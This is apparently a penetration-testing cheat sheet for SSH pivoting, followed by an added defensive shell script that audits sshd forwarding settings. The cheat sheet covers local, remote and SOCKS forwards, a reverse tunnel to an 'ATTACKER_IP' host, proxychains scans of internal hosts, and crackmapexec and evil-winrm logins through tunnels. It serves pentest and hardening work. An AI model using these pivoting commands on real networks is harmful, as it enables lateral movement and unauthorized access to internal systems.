SSH TUNNELING
Local port forward
Access internal:80 via your localhost:8080 — Browse internal web apps
ssh -L 8080:INTERNAL_TARGET:80 user@PIVOT_HOST
Example Output
ssh -L 8080:172.16.1.10:80 john@10.10.14.5
Now browse: http://127.0.0.1:8080
(You see internal web app on 172.16.1.10:80)
Remote port forward
Run from the pivot: a port the pivot can reach becomes reachable on the machine you SSH to (here the pivot's own 127.0.0.1:80 appears as port 9090 on ATTACKER_IP)
ssh -R 9090:127.0.0.1:80 user@ATTACKER_IP
Example Output
ssh -R 9090:127.0.0.1:80 attacker@10.10.14.2
On attacker: curl http://127.0.0.1:9090
(Access pivot's localhost:80 from your machine)
Dynamic SOCKS proxy
SOCKS proxy through pivot — Route any tool through pivot
ssh -D 1080 user@PIVOT_HOST
Example Output
ssh -D 1080 john@10.10.14.5
Edit /etc/proxychains4.conf:
socks5 127.0.0.1 1080
proxychains nmap -sT -Pn 172.16.1.10
(Scan internal network through pivot)
Use SOCKS proxy
Prepend proxychains to any command — Edit /etc/proxychains4.conf: socks5 127.0.0.1 1080
proxychains nmap -sT -Pn INTERNAL_TARGET
proxychains crackmapexec smb INTERNAL_TARGET
Example Output
proxychains nmap -sT -Pn 172.16.1.10
ProxyChains | S-chain |->127.0.0.1:1080
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
445/tcp open microsoft-ds
(Scanning internal network through pivot)
SSH with key + tunnel
Multiple port forwards at once — Forward several services
ssh -i id_rsa -L 445:DC_IP:445 -L 5985:DC_IP:5985 user@PIVOT
Example Output
ssh -i id_rsa -L 445:172.16.1.10:445 -L 5985:172.16.1.10:5985 john@10.10.10.5
Now on attacker:
crackmapexec smb 127.0.0.1 -u admin -p Pass
evil-winrm -i 127.0.0.1 -u admin -p Pass
(Multiple internal ports forwarded at once)
Persistent SSH tunnel
Background tunnel: -f forks to the background after authentication, -N runs no remote command, -T allocates no pseudo-TTY
ssh -fNT -L 8080:INTERNAL:80 user@PIVOT
Example Output
ssh -fNT -L 8080:172.16.1.10:80 john@10.10.10.5
(Returns to prompt, tunnel runs in background)
curl http://127.0.0.1:8080
(Access internal web app while working)
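Every mode above (-L, -R, -D) is granted or refused by a handful of sshd directives on the pivot, so the defender-side check is to read the server's effective configuration. The following shell script is an added example, not part of the original cheat sheet: it audits `sshd -T`-style output (one lowercase keyword and value per line) for AllowTcpForwarding, GatewayPorts, PermitOpen and PermitTunnel and counts the permissive settings. Both configuration samples are constructed; on a real host the input is `sshd -T > effective.conf`.

```shell
#!/bin/sh
# Added example: audit sshd's effective configuration for the directives that
# control SSH port forwarding. Input format is that of `sshd -T` (lowercase
# keyword, value). Constructed samples are embedded so this runs offline.

# Constructed sample: a server that permits every forwarding mode (weak).
SAMPLE_WEAK='port 22
allowtcpforwarding yes
gatewayports yes
permitopen any
permittunnel no
x11forwarding no'

# Constructed sample: the same server with forwarding locked down (hardened).
SAMPLE_HARDENED='port 22
allowtcpforwarding no
gatewayports no
permitopen none
permittunnel no
x11forwarding no'

# audit_forwarding FILE
# Prints one line per finding; return status is the number of findings (0 = clean).
audit_forwarding() {
    file="$1"
    findings=0

    # get KEYWORD: value of the first matching keyword in the sshd -T dump.
    get() { awk -v k="$1" '$1 == k { print $2; exit }' "$file"; }

    # -L, -R and -D all ride on TCP forwarding; sshd defaults to "yes".
    v=$(get allowtcpforwarding)
    case "$v" in
        no) ;;
        local|remote)
            echo "WARN  allowtcpforwarding=$v: one forwarding direction still open"
            findings=$((findings + 1)) ;;
        *)
            echo "WARN  allowtcpforwarding=${v:-yes (default)}: -L, -R and -D all permitted"
            findings=$((findings + 1)) ;;
    esac

    # GatewayPorts other than "no" lets a -R listener bind beyond loopback.
    v=$(get gatewayports)
    if [ "$v" != "no" ]; then
        echo "WARN  gatewayports=${v:-unset}: remote forwards reachable from other hosts"
        findings=$((findings + 1))
    fi

    # PermitOpen any places no limit on -L / -D destinations.
    v=$(get permitopen)
    if [ "$v" = "any" ]; then
        echo "WARN  permitopen=any: forwarded connections may reach any host:port"
        findings=$((findings + 1))
    fi

    # PermitTunnel governs layer-2/3 tun devices (ssh -w), a separate path.
    v=$(get permittunnel)
    if [ "$v" != "no" ]; then
        echo "WARN  permittunnel=${v:-unset}: tun-device tunnels permitted"
        findings=$((findings + 1))
    fi

    return "$findings"
}

# audit_string CONFIG_TEXT: convenience wrapper that audits an in-memory dump.
audit_string() {
    tmp=$(mktemp)
    printf '%s\n' "$1" > "$tmp"
    count=0
    audit_forwarding "$tmp" || count=$?
    rm -f "$tmp"
    return "$count"
}

echo "== weak sample =="
weak=0; audit_string "$SAMPLE_WEAK" || weak=$?
echo "-> $weak finding(s)"
echo "== hardened sample =="
hard=0; audit_string "$SAMPLE_HARDENED" || hard=$?
echo "-> $hard finding(s)"
```

The exit status doubles as the finding count, so the function drops straight into a compliance script or a cron job that alerts when the count is non-zero; `local` and `remote` for AllowTcpForwarding are reported as findings too, since either still allows one of the forwarding directions shown above.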